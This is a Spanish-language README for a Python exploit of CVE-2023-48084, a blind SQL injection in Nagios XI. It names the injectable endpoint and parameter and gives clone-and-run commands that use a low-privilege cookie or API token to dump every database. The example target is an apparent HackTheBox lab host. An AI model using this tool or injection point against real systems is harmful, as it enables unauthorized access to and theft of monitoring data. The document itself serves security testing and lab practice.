
Programa en Python para volcar todas las bases de datos, explotando la vulnerabilidad sqli de NagiosXI
Exploit en Python para CVE-2023-48084 -> Se descubrió que Nagios XI anterior a la versión 5.11.3 contenía una vulnerabilidad de inyección SQL a través de la herramienta de modificación masiva.
El exploit utiliza /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<COMANDO SQL A EJECUTAR>) para ejecutar consultas SQL, y explota una inyección SQL ciega...
Clona el repositorio e instala los requisitos de requirements.txt
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
Ahora ejecuta el programa, necesitas una cookie de sesión no administrador, o un token API, ejemplo
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>
Por defecto intentará volcar toda la base de datos comenzando por los esquemas, si deseas que sea más rápido, solo mira el código y toma la parte que necesites.